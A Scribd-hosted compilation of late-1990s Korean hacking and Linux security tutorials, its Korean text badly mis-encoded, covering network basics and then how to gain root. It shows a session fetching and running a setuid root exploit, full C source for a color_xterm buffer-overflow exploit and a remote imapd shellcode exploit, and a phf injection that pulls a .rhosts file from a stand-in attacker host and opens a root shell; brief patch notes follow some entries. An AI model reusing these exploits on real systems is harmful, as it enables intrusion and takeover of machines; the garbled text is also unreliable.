Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Hacker 04

    Enviado por

    dhirajsingh_avit
    20 visualizações35 páginas

    Direitos autorais

    © Attribution Non-Commercial (BY-NC)

    Formatos disponíveis

    TXT, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    20 visualizações35 páginas

    Hacker 04

    Enviado por

    dhirajsingh_avit

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 35

    Á¦ ¸ñ: [°ÁÂ] °ÔÀÌÆ®¿þÀÌ , ¶ó¿ìÅÍ , ºê¸´Áö¶õ?

    °ÔÀÌÆ®¿þÀÌ(Gateway)´Â ÀϹÝÀûÀ¸—Î ÇϳªÀÇ ³×Æ®¿öÅ©, ȤÀº ¿ïŸ¸® ¾È¿¡¼


    ¹ÛÀ¸—Î ºüÁ®³ª°¡´Â Áß°£ °ü¹®¿ªÇÒÀ» ¼öÇàÇÏ´Â °ÍÀ» Gateway¶ó°í ÇÕ´Ï´Ù.
    ÀϹÝÀûÀ¸—Î À̾߱âÇÒ¶§, ¶ó¿ìÅÍ(Router)¿Í °ÔÀÌÆ®¿þÀÌ´Â °°Àº Àǹ̗Π»ý°¢ÇϽøé
    ¹®Á¦°¡ ¾øÀ» °ÍÀÔ´Ï´Ù.
    ÇÏÁö¸¸, °ÔÀÌÆ®¿þÀÌ°¡ ´Ù¸¥ Àǹ̗Π»ç¿ëµÉ ¼öµµ ÀÖ½À´Ï´Ù.
    ¿¹¸¦ µé¸é, WWW¿¡¼ CGI(Common Gateway Interface)°°Àº °ÍÀº °ÔÀÌÆ®¿þÀÌÀÇ
    Àǹ̰¡ ¶ó¿ìÅͶû ´Ù¸£Áö¿ä.
    http daemonÀÌ ÀÎÀÚ¸¦ ¹Þ¾Æ ¾î¶² ÇÁ—αח¥À» ½ÇÇà½ÃÄÑ
    ±× °á°ú°ªÀ» »ç¿ëÇÏ¿© client¿¡ ´Ù½Ã htmlÇüÅ—ΠÀڗḦ ÀüÇØÁÖ´
    ÇÏ¿©°£, 'ÀϹÝÀû'ÀÎ °æ¿ì¿¡, Router¿Í Gateway´Â °°Àº Àǹ̗Π»ç¿ëµË´Ï´Ù.
    ºê¸´Áö(Bridge)´Â ¹«¾ùÀ̳ĸé¿ä.
    Router¿Í ºñ½ÁÇÏ°Ô, packetÀ» filtering, forwardingÇØ ÁÖ´Â ¿ªÇÒÀ» ¼öÇàÇÏ´Â
    Network ÀåºñÀÔ´Ï´Ù.
    Router¿Í ¹«¾ùÀÌ ´Ù¸£³Ä°í¿ä?
    Bridge´Â Ethernet Address(LANÄ«µå ROM¿¡ ¹ÚÇôÀÖ´Â °íÀ‾³Ñ¹ö)—Î packetÀ»
    filteringÇÕ´Ï´Ù.
    Router´Â IP address—Î packetÀ» filtering, forwardingÇÕ´Ï´Ù.
    ÀÌ°Ô ¹«½¼ Àǹ̳Ä?
    A¶ó´Â LAN°ú B¶ó´Â LANÀÌ ºê¸´Áö—Î ¿¬°áµÇ¾î ÀÖ´Ù°í °¡Á¤ÇÕ´Ï´Ù.
    Ethernet¿¡¼ A¶ó´Â LAN¾È¿¡ ÀÖ´Â ÇÑ È£½ºÆ®°¡ °°Àº LAN¾ÈÀÇ È£½ºÆ®¿¡°Ô
    packetÀ» º¸³À´Ï´Ù.
    ±×—‾¸é, ÀÌ ÆÐŶÀº B¶ó´Â LANÀ¸—Î Àü´ÞµÉ±î¿ä?

    ±×—¸Áö ¾Ê½À´Ï´Ù. EthernetÀº ¹æ¼Û(broadcasting)¹æ½ÄÀ¸—Î packetÀ» º¸³»¹Ç—Î


    A—£¾ÈÀÇ ºê¸´Áö¸¦ Æ÷ÇÔÇÑ ¸ðµç È£½ºÆ®°¡ °°Àº ÆÐŶÀ» ¹Þ¾Æº¸Áö¸¸,
    ºê¸´Áö´Â A—£ ¾ÈÀÇ È£½ºÆ®°¡ A—£ ¾ÈÀÇ È£½ºÆ®—Î packetÀ» º¸³»´Â °ÍÀ̹ǗÎ
    B—£ÂÊÀ¸—δ packetÀ» broadcastingÇÏÁö ¾Ê½À´Ï´Ù.
    ¸¸ÀÏ, A—£¾ÈÀÇ È£½ºÆ®¿¡¼ packetÀ» B—£¾ÈÀÇ È£½ºÆ®—Î º¸³½´Ù¸é,
    ¸ÕÀú È£½ºÆ®´Â A—£¾ÈÀ¸—Î packetÀ» broadcastingÇÕ´Ï´Ù.
    A—£¾È¿¡´Â packetÀÇ ¸ñÀûÁö°¡ ¾øÁö¿ä.
    ÇÏÁö¸¸, ÀÌ ÆÐŶÀ» ¹Þ¾Æº» ºê¸´Áö´Â ÀÌ°É BÂÊÀ¸—Î broadcastingÇÏ´Â °Ì´Ï´Ù.
    ±×—³, ÆÐŶÀÌ Àü´ÞµÇ°ÚÁÒ.
    ±×—‾±â À§Çؼ´Â Bridge´Â µÎ°³ ÀÌ»óÀÇ Network Interface¸¦ °¡Á®¾ß ÇÏ°í¿ä
    (¾çÂÊ —£À¸—Î Çϳª¾¿ÀÇ Interface°¡ ÀÖ¾î¾ß ÇÏ°ÚÁö¿ä)
    ¾çÂÊ LAN¾ÈÀÇ Ethernet Address¿¡ ´ëÇÑ Á¤º¸¸¦ ¸ðµÎ °¡Áö°í ÀÖ¾î¾ß ÇÕ´Ï´Ù.
    LANÀ¸—Î ¿¬°áÇϸé ÀÚµ¿À¸—Î bridge¿¡¼ À̸¦ °¨ÁöÇؼ Á¤º¸ tableÀ» ¸¸µéÁö¿ä.
    ºê¸´Áö(Bridge)¸¦ »ç¿ëÇÏ´Â ¸ñÀûÀº segment¸¦ ºÐ¸®Çϱâ À§ÇØ »ç¿ëµË´Ï´Ù.
    Ethernet¹æ½ÄÀÇ ¾àÁ¡Àº broadcasting¹æ½Ä ¶§¹®¿¡ ÇϳªÀÇ LAN¾È¿¡ ³Ê¹« ¸¹Àº
    È£½ºÆ®°¡ ¹°—ÁÀÖ´Ù¸é, ¼º´ÉÀÌ ÀúÇϵDZ⠶§¹®ÀÔ´Ï´Ù.
    ±×—‾¹Ç—Î, ÇϳªÀÇ —£À» µÎ°³ ÀÌ»óÀ¸—Î ÂÉ°¶¶§,
    Áï, Bridge¸¦ µÎ¾î °°Àº —£¾ÈÀÇ packetÀº ¹Ù±ùÀ¸—Î ³ª°¡Áö ¸øÇÏ°Ô Çϸé
    À̗± ´ÜÁ¡À» ±Øº¹ÇÒ ¼ö ÀÖ½À´Ï´Ù.
    Router´Â Bridge¿Í µ¿ÀÛ¿ø¸®°¡ °°½À´Ï´Ù.
    ´Ü, packetÀ» ¹«¾ùÀ¸—Î filtering/forwardingÇÏ´À³Ä°¡ ´Ù¸¨´Ï´Ù.
    ÀϹÝÀûÀÎ router´Â bridge ±â´ÉÀ» °âÇÏ°í ÀÖ½À´Ï´Ù.
    ±×—¡¼, ºê¶ó¿ìÅÍ(brouter)¶ó°í ºÎ¸£±âµµ ÇÏÁö¿ä.
    ±×¸²À» ±×—Á¼ Á»´õ ÀÚ¼¼È÷ ¼³¸íÇϸé ÁÁÀ¸—ø¸....
    È÷È÷, ´õÀÌ»ó ¸»ÇÏ¸é ¾ø´Â ½Ç—ÂÀÌ µéÅ볪°ÚÁö¿ä? :-P

    ¸¶Áö¸—À¸—Î ÇѸ¶µð ´õ,


    EthernetÀº ISO 802À§¿øȸ¿¡¼ Á¦Á¤ÇÑ 802.2¹æ½Ä
    (CSMA/CD, Carrier Sense Multiple Access with Collision Detection)
    À» »ç¿ëÇÕ´Ï´Ù.
    ±Ã±ÝÇÏ½Ã¸é ¾Æ¹«°Å³ª Åë½ÅÃ¥À» º¸½Ã¸é Ä£ÀýÇÏ°í ÀÚ¼¼ÇÑ ¼³¸íÀÌ
    ³ª¿ÍÀÖÀ» °Ì´Ï´Ù.
    Á¦ ¸ñ: [°ÁÂ] ÇØŗÇÏ´Â ¹æ¹ý
    ÀÌ °Á´ ¾ÆÁÖ À§ÇèÇÑ °Á°¡ µÉ ¼öµµ ÀÖ½À´Ï´Ù.
    ÀÌ °Á¸¦ Àß ÀÌ¿ëÇÏ¸é ³ª¿ì´©¸®°èÁ¤ ¼ºñ½º¸¦ ÇØŗ ÇÒ ¼öµµ
    ÀÖ´Â ½Ç—ÂÀÚ(?)°¡ µÇÁÒ.. ¼ÓÀÌ ºó °Ñ¸¸ ȍ—ÁÇÑ ½Ç—ÂÀÚ¿ä.
    Àý´ë—Î ÀÌ°ÍÀ» ±×´ë—Î Èä³»¸¸ ³»º¸°í ±×°Í¿¡¼ ¸ØÃß¼¼¿ä.
    ´õ °øºÎ¸¦ ÇÑÈÄ¿¡ º»°ÝÀûÀ¸—Î ÇϽðí..
    ±×—³ °Á ¿Ã¶ó °©´Ï´Ù.
    Âü°í—Î °ú°Å¿¡ ÇØŗ»ç°ÇÀ¸—Î ¶°µé¼®ÇÑ ÇØŗÀº ¸ðµÎ À̗± Á¾—ùÀÇ ÇØŗÀÔ´Ï´Ù.
    Ãʺ¸ÀûÀÎ ¼öÁØÀÌÁö¿ä.
    ±×—³..
    ÇØŗÇÏ´Â »ç¶÷µéÀÇ ´ëºÎºÐÀº À̗± ½ÄÀ¸—Î ÇÑ´ä´Ï´Ù.
    ¾ÆÁÖ º¸ÆíÀûÀÎ °ÍÀÌÁÒ..
    ¹Ù—Î ¼Ò½º Äڵ带 ÇØ´ç È£½ºÆ®(ÇØŗ´ë»ó)¿¡¼ ÄÄÆÄÀÏ ÇÑÈÄ ½ÇÇà½ÃÅ°¸é
    ³¡³ª´Â °ÅÁÒ..
    ¾ÆÁÖ ½±´Ù±¸¿ä?
    ±×—³ ±× °úÁ¤À» Çѹø Çغ¼±î¿ä?
    [ ½ÃÀÛ ]
    [root@loveyou lib]# telnet bbs.xxx.xx.xx
    Trying 20.23.10.3...
    Connected to xxxxxx.xx.kr.
    Escape character is '^]'.
    Welecom My host~
    ## 01:17 on Monday, 30 March 1998 (ttyp5)
    login: loveyou
    Password:
    Last login: Mon Mar 30 00:50:04 from loveyou
    [loveyou@bbs loveyou]$ ls -al /usr/bin/sperl*
    -rwsr-xr-x 2 root root 402280 Apr 22 1997 /usr/bin/sperl5.003
    /* ÇØŗÇÒ ´ë»óÀ» ã½À´Ï´Ù. ´ëºÎºÐÀÌ setuid °¡ °É¸° ÇÁ—αח¥À» ãÀ½
    º¸¼¼¿ä. rws ¶ó°í setuid°¡ ¼³Á¤µÇ¾úÁÒ?
    ±×—±ÈÄ¿¡ ÇØ´ç ÇØŗ ÇÁ—αח¥À» °¡Á®¿Í¼ ÄÄÆÄÀÏÀ» ÇÕ´Ï´Ù.
    º¸ÅëÀº ftp —Î ±× ¼Ò½º¸¦ °¡Á® ¿É´Ï´Ù. */
    [loveyou@bbs loveyou]$ ftp loveyou.ml.org
    Connected to loveyou.ml.org.
    220 xxxxxxxx.xx.xx.xr FTP server (Version wu-2.4.2-academ[BETA-xx](1) Sat xxx xx
    xx:xx:xx KST 199x) ready.
    Name (xxxxx:loveyou): loveyou
    331 Password required for loveyou
    Password:
    230 User shade logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> get hack.c
    local: hack.c remote: hack.c
    200 PORT command successful.
    150 Opening BINARY mode data connection for hack.c (4037 bytes).
    226 Transfer complete.
    4037 bytes received in 1.57 secs (2.5 Kbytes/sec)
    ftp> quit
    [loveyou@bbs loveyou]$ cc -o hack hack.c
    /* ¼Ò½º¸¦ ÄÄÆÄÀÏ ÇÑ´Ù. hack À̶ó´Â ÇÁ—αח¥ »ý¼º */
    [loveyou@bbs loveyou]$ ./hack
    Using address: 0x45c
    # <- root ÇÁ—ÒÇÁÆ® Áö¿ä? À̗¸°Ô µÇ¸é ¼º°øÀÌ¿¡¿ä
    ÇØŗ Çϱ⠳ʹ« ½¬¿ö¿ä.±×—¸Áö ¾ÊÀº°¡¿ä?
    ÇÏÁö¸¸ À̗¸°Ô ½¬¿î ÇØŗÀº ¹Ì¿¬¿¡ °ü¸®ÀÚµéÀÌ ¹æÁöÇÒ ¼ö ÀÖÁö¿ä..
    °ü¸®ÀÚ´Â µÎ°¡Áö ÇൿÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù.
    ù¹ø°, ¿ì¼± ¸—¾ÆµÐ´Ù. chmod 700 /usr/bin/sperl*
    µÎ¹ø°, ±× ´ÙÀ½Àº ftp —Î °¢ ÇØ´ç ¸®´ª½º »çÀÌÆ®³ª ¼ÒÇÁÆ®¿þ¾î »çÀÌÆ®—Î °¡¼
    ÆÐÄ¡ ÆÄÀÏÀ» °¡Á®¿Í¼ ÆÐÄ¡ÇÑ´Ù. ¾î¶»°Ô ÇÒÁö ¸ð¸¥´Ù¸é
    ±×³É ù¹ø°¸¸ Çسõ°í À־ µÇ°í —‾ºêÀ‾¿¡°Ô ÀÚ¹®À» ±¸Çصµ µÈ´Ù.
    ^_^
    ¿©±â±îÁö¿¡¿ä.
    Àç¹ÌÀÖÁö¿ä?

    À̗±°ÍÀÌ ÇØŗÀÌ¿¡¿ä.
    °ú°Å¿¡ ³ª¿ì´©¸® °èÁ¤ ¼¹ö ÇØŗÇؼ ³¸®³µ´ø °íµîÇлýÀº À̗± ÇØŗÀ̾úÁÒ.
    ³Ê¹« °£´ÜÇÏÁÒ?
    ÇØŗÀ̶ó´Â °Ç ÀÌÁ¤µµ°¡Áö°í º¼ ¼ö°¡ ¾ø¾î¿ä.
    ¾ÆÁÖ ÀϺκп¡ ºÒ°úÇϴϱî¿ä
    ÇÏÁö¸¸ À̗± °ÍÀ» ¼º°øÇß´Ù°í ¿ìÂá´ë´Â »ç¶÷µéÀÌ ¸¹¾Æ¼ Á» ±×—¸³×¿ä.

    Á¦ ¸ñ: [°ÁÂ] ¿ÜºÎ Æ‾Á¤ È£½ºÆ®ÀÇ Á¢±Ù ¸—±â


    À½..¾î¶² È£½ºÆ®¿¡¼ ÀÚ²Ù ÀÌ»óÇÑ »ç¶÷ÀÌ µé¾î¿Â´Ù°í ´À³¥¶©
    ±× È£½ºÆ®ÀÇ »ç¶÷¸¸ ¸øµé¾î¿À°Ô ÇÏ°í ½Í´Ù±¸¿ä?
    ±×—¸´Ù¸é ¹æ¹ýÀÌ ÀÖÁÒ.
    ¹Ù—Î À‾´Ð½º,¸®´ª½º¶ó¸é ±âº»ÀûÀ¸—Î ¼³Ä¡µÇ¾î ÀÖ´Â TCP ¿ÍÆÛ¸¦ ÀÌ¿ëÇÏ´Â
    °Ì´Ï´Ù. ¾Æ~ À¢Áö °ÅâÇÏ´Ù±¸¿©?
    µû¾Ç 2ÁÙ¸¸ ¾²¸é µË´Ï´Ù.ÇÏÇÏ
    /etc/hosts.deny ¶ó´Â ÆÄÀÏÀÌÁÒ.. ±× ÆÄÀϾȿ¡
    ÇÁ—ÎÅäÄÝ:È£½ºÆ®³×ÀÓ
    À̗± Çü½ÄÀ¸—Î ¾²¸é µË´Ï´Ù.
    ±× ¿¹¸¦ µé¸é
    ALL:soback.kornet.nm.kr
    À̶ó´Â ³»¿ëÀº soback.kornet.nm.kr ¿¡¼ ¿À´Â ¸ðµç ÇÁ—ÎÅäÄÝÀÇ Á¢¼ÓÀ»
    ±ÝÁö ÇÑ´Ù´Â ¸»ÀÔ´Ï´Ù.
    Èå..À‾¿ëÇÏÁÒ?
    /etc/hosts.allow ¶ó´Â ÆÄÀÏÀº Æ‾Á¤ È£½ºÆ®ÀÇ Á¢¼ÓÀ» Çã°¡ ÇÒ¶§ ÇÏÁÒ.
    ±×—‾´Ï±ñ À½ À§ÀÇ /etc/hosts.denyº¸´Ü »óÀ§ÀÇ ºñÁßÀ» Â÷Áö ÇÕ´Ï´Ù.
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º xterm,color_xterm
    ¸í—É
    xrm (color_xterm, xterm, nxterm)
    ½Ã½ºÅÛ
    Linux Slackware 3.1, RedHat 4.2
    ¹®Á¦Á¡
    ¹öÆÛ ¿À¹ö Ç×ο츦 ÀÏÀ¸Å²´Ù.
    >-- cx.c --<
    /*
    * color_xterm buffer overflow exploit for Linux with
    * non-executable stack
    * Copyright (c) 1997 by Solar Designer
    *
    * ÄÄÆÄÀÏ ¹æ¹ý:
    * gcc cx.c -o cx -L/usr/X11/lib \
    * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e
    s/\\\.so.\\\+//`
    *
    * ½ÇÇà :
    * $ ./cx
    * system() found at: 401553b0
    * "/bin/sh" found at: 401bfa3d
    * bash# exit (^^;)
    * Segmentation fault
    */
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #define SIZE1 1200 /* Amount of data to overflow with */
    #define ALIGNMENT1 0 /* 0..3 */
    #define OFFSET 22000 /* Structure array offset */
    #define SIZE2 16000 /* Structure array size */
    #define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */
    #define SIZE3 SIZE2
    #define ALIGNMENT3 (ALIGNMENT2 & 3)
    #define ADDR_MASK 0xFF000000
    char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2];
    int *ptr;
    int pid, pc, shell, step;
    int started = 0;
    jmp_buf env;
    void handler() {
    started++;
    }
    /* SIGSEGV handler, to search in libc */
    void fault() {
    if (step < 0) {
    /* Change the search direction */
    longjmp(env, 1);
    } else {
    /* The search failed in both directions */
    puts("\"/bin/sh\" not found, bad luck");
    exit(1);
    }
    }
    void error(char *fn) {
    perror(fn);
    if (pid > 0) kill(pid, SIGKILL);
    exit(1);
    }
    int nz(int value) {
    if (!(value & 0xFF)) value |= 8;
    if (!(value & 0xFF00)) value |= 0x100;
    return value;
    }
    void main() {
    /*
    * A portable way to get the stack pointer value; why do other
    exploits use
    * an assembly instruction here?!
    */
    int sp = (int)&sp;
    signal(SIGUSR1, handler);
    /* Create a child process to trace */
    if ((pid = fork()) < 0) error("fork");
    if (!pid) {
    /* Send the parent a signal, so it starts tracing */
    kill(getppid(), SIGUSR1);
    /* A loop since the parent may not start tracing immediately */
    while (1) system("");
    }
    /* Wait until the child tells us the next library call will be
    system() */
    while (!started);
    if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");
    /* Single step the child until it gets out of system() */
    do {
    waitpid(pid, NULL, WUNTRACED);
    pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
    if (pc == -1) error("PTRACE_PEEKUSR");
    if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
    error("PTRACE_SINGLESTEP");
    } while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));
    /* Single step the child until it calls system() again */
    do {
    waitpid(pid, NULL, WUNTRACED);
    pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
    if (pc == -1) error("PTRACE_PEEKUSR");
    if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
    error("PTRACE_SINGLESTEP");
    } while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));
    /* Kill the child, we don't need it any more */
    if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");
    pid = 0;
    printf("system() found at: %08x\n", pc);

    /* Let's hope there's an extra NOP if system() is 256 byte aligned */


    if (!(pc & 0xFF))
    if (*(unsigned char *)--pc != 0x90) pc = 0;
    /* There's no easy workaround for these (except for using another
    function) */
    if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) {
    puts("Zero bytes in address, bad luck");
    exit(1);
    }
    /*
    * Search for a "/bin/sh" in libc until we find a copy with no zero
    bytes
    * in its address. To avoid specifying the actual address that libc is
    * mmap()ed to we search from the address of system() in both
    directions
    * until a SIGSEGV is generated.
    */
    if (setjmp(env)) step = 1; else step = -1;
    shell = pc;
    signal(SIGSEGV, fault);
    do
    while (memcmp((void *)shell, "/bin/sh", 8)) shell += step;
    while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000));
    signal(SIGSEGV, SIG_DFL);
    printf("\"/bin/sh\" found at: %08x\n", shell);
    /* buf1 (which we overflow with) is filled with pointers to buf2 */
    memset(buf1, 'x', ALIGNMENT1);
    ptr = (int *)(buf1 + ALIGNMENT1);
    while ((char *)ptr < buf1 + SIZE1 - sizeof(int))
    *ptr++ = nz(sp - OFFSET); /* db */
    buf1[SIZE1 - 1] = 0;
    /* buf2 is filled with pointers to "/bin/sh" and to buf3 */
    memset(buf2, 'x', SIZE2 + SIZE3);
    ptr = (int *)(buf2 + ALIGNMENT2);
    while ((char *)ptr < buf2 + SIZE2) {
    *ptr++ = shell; /* db->mbstate */
    *ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */
    }
    /* buf3 is filled with pointers to system() */
    ptr = (int *)(buf3 + ALIGNMENT3);
    while ((char *)ptr < buf3 + SIZE3 - sizeof(int))
    *ptr++ = pc; /* db->methods->mbfinish */
    buf3[SIZE3 - 1] = 0;
    /* Put buf2 and buf3 on the stack */
    setenv("BUFFER", buf2, 1);
    /* GetDatabase() in libX11 will do
    (*db->methods->mbfinish)(db->mbstate) */
    execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1,
    NULL);
    error("execl");
    }
    >-- cx.c --<
    ÇØ°áÃ¥
    ¾Æ—¡¿¡¼ ÆÐÄ¡¹öÁ‾À» ã¾Æ¼ ÆÐÄ¡ÇÑ´Ù.
    http://www.false.com/security/linux-stack/3:50 (17ÁÙ)

    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º Ghostscript


    ¸í—É
    Ghostscript
    ½Ã½ºÅÛ
    Linux systems running Ghostscript 1.4
    ¹®Á¦Á¡
    °í½ºÆ® ½ºÅ©¸³ÀÇ ¹®Á¦Á¡Àº ¾î¶² ¼û°ÜÁø Äڵ带 ÀÌ¿ëÇؼ ±×°ÍÀ» ÀÌ¿ëÇØ
    Àá½Ã ½©À» ÅëÇؼ ¾î¶²ÀÏÀ» ÇÒ ¼ö ÀÖ´Ù. ±× ÄÚµå´Â Æ÷½ºÆ® ½ºÅ©¸³Æ®ÀÇ
    ¼û°ÜÁø ºñ¹Ð ÄÚµåÀÏ °ÍÀÌ´Ù. —çÆ®ÀÇ ¸í—ÉÀ» ³»¸± ¼ö ÀÕ´Ù.
    ¹®Á¦Á¡
    1.4 ÀÌÈÄÀÇ °í½ºÆ® ½ºÅ©¸³Æ®¸¦ ±ò¾Æ¶ó..
    ---------------------------
    ¹ø È£: 114/177 µî—ÏÀÚ: ±è¿ëÁØ(—‾ºêÀ‾) 98/02/16 23:52 (89ÁÙ)
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º imapd
    ¸í—É
    imapd
    ½Ã½ºÅÛ
    RedHat 4.0¹öÁ‾ ±îÁö
    Slackware 3.2
    ¹®Á¦Á¡
    imapdµ¥¸óÀ» ÀÌ¿ëÇؼ ¸®¸ðÆ® Á¢¼Ó ÀÚ°¡ —çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù.
    ÀÌ´Â ¸Å¿ì À§ÇèÇϸç...—çÆ®Æнº¿öµå Á¶Â÷ ¹Ù²Ü ¼ö ÀÖ´Ù.
    /*
    * IMAPd Linux/intel remote xploit by savage@apostols.org
    * 1997-April-05
    * Workz fine against RedHat and imapd distributed with pine
    * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the
    * rest of ToXyn !!!
    * usage:
    * $ (imap 0; cat) | nc victim 143
    * |
    * +--> usually from -1000 to 1000 ( try in steps of 100
    )
    * [ I try 0, 100 and 200 - so1o ]
    */
    #include
    char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
    "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
    "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xe8\xc0\xff\xff\xff/bin/sh";
    char username[1024+255];
    void main(int argc, char *argv[]) {
    int i,a;
    long val;
    if(argc>1)
    a=atoi(argv[1]);
    else
    a=0;
    strcpy(username,shell);
    for(i=strlen(username);i> 8;
    username[i+2] = (val & 0x00ff0000) >> 16;
    username[i+3] = (val & 0xff000000) >> 24;
    }
    username[ sizeof(username)-1 ] = 0;
    printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username);
    }
    ÇØ°áÃ¥
    —¡µåÇÞ 4.0 »ç¿ëÀÚ´Â 4.1—Î ¹Ù²Ù¸é ÆÐÄ¡µÈ´Ù.
    —¡µåÇÞ 2.0 »ç¿ëÀÚ´Â rpm -e imap¸¦ ½ÇÇà½ÃÄѼ ¾ø¾Ö¶ó
    ftp.redhat.com ¿¡ °¡¸é ÆÐÄ¡µÈ°ÍÀÌ ÀÖÀ¸´Ï ¹Þ¾Æ¼ ÆÐÄ¡Ç϶ó

    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ircd


    ¸í—É
    ircd
    ½Ã½ºÅÛ
    Debian Linux(1.3.1)
    ¹®Á¦Á¡
    IRC¼¹öÀÇ ÆÐÅ°ÁöÀÎ ircd 2.9.32-3 Àº µ¥ºñ¾È 1.3.1¿¡ Æ÷ÇԵǾî ÀÖ´Ù.
    ù°—Î ¹®Á¦Á¡Àº /etc/ircd/ ¸¦ ÀÐÀ»¼ö ÀÖ´Ù. ÀÌ µð—ºÅ丮¿¡ Æ÷ÇÔµÈ
    ¼¹ö ¼³Á¤ ÆÄÀÏ°ú irc ¼³Á¤ÀÚÀÇ Æнº¿öµå Á¶Â÷ ÀÐÀ» ¼ö ÀÖµµ—Ï
    Æ۹̼ÇÀÌ ¿—ÁÀÖ´Ù.
    µÑ°—Î ÆÐÅ°Áö¸¦ ¼³Ä¡Çϸé /etc/inetd.conf¿¡ À̗± ÇÑÁÙÀÌ ¼³Á¤µÈ´Ù.
    ircd stream tcp wait root /usr/sbin/ircd ircd -i
    ------
    À§¿¡¼ º¸µíÀÌ root ¶ó°í µÇ¾î ÀÖ´Â ºÎºÐÀ» irc ¶ó°í °íÃĶó..
    —çÆ®´Â °³¿©ÇÏÁö ¾Ê´Â°ÍÀÌ ¿øÄ¢ÀÌ´Ù.
    ÇØ°áÃ¥
    Loveyou~# chmod 700 /etc/ircd/
    Loveyou~# chown irc.irc /etc/ircd/
    Loveyou~# grep ircd /etc/inetd.conf
    ircd stream tcp wait irc /usr/sbin/ircd ircd -i
    À§Ã³—³ irc ¶ó°í °íÃÄÁ®¾ß ÇÑ´Ù.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º rcp (¸®¸ðÆ®)
    ¸í—É
    /usr/bin/rcp
    ½Ã½ºÅÛ
    Red Hat 4.0 (if user nobody has UID 65535 and Slackware 3.1
    (possibly others)
    ¹®Á¦Á¡
    nobodyÀÇ uid°¡ 65535À϶§ /usr/bin/rcpÀÇ ¹®Á¦Á¡ÀÌ ³ªÅ¸³´Ù.
    »ó´ë¹æÀÇ ¼¹ö°¡ NCSA httpd ¼¹ö¸¦ ¾´´Ù¸éÀº ´ÙÀ½°ú °°Àº ÀÏÀ» ¹úÀÏ ¼ö°¡
    ÀÖ´Ù.
    root[11:20][504]~# su - nobody
    [nobody@slip-70-8 /]$ id
    uid=65535(nobody) gid=65535
    [nobody@slip-70-8 /]$ rcp oberheim@moe.cc.utexas.edu:brb /tmp/test
    [nobody@slip-70-8 /]$ ls -la /tmp/test
    -rw------- 1 root 65535 0 Jan 29 11:20 /tmp/test
    $ echo "+ +" > /tmp/my.rhosts
    $ echo "GET
    /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+
    /root/.rhosts" | nc -v - 20 victim.com 80
    $ rsh -l root victim.com "/bin/sh -i"
    #

    ÇØ°áÃ¥
    nobodyÀÇ UID¸¦ 99 —Î Çصξî¶ó.
    ---------------------------
    Á¦ ¸ñ: [º¸¾È] ¸®´ª½º perl 5.003
    ¸í—É
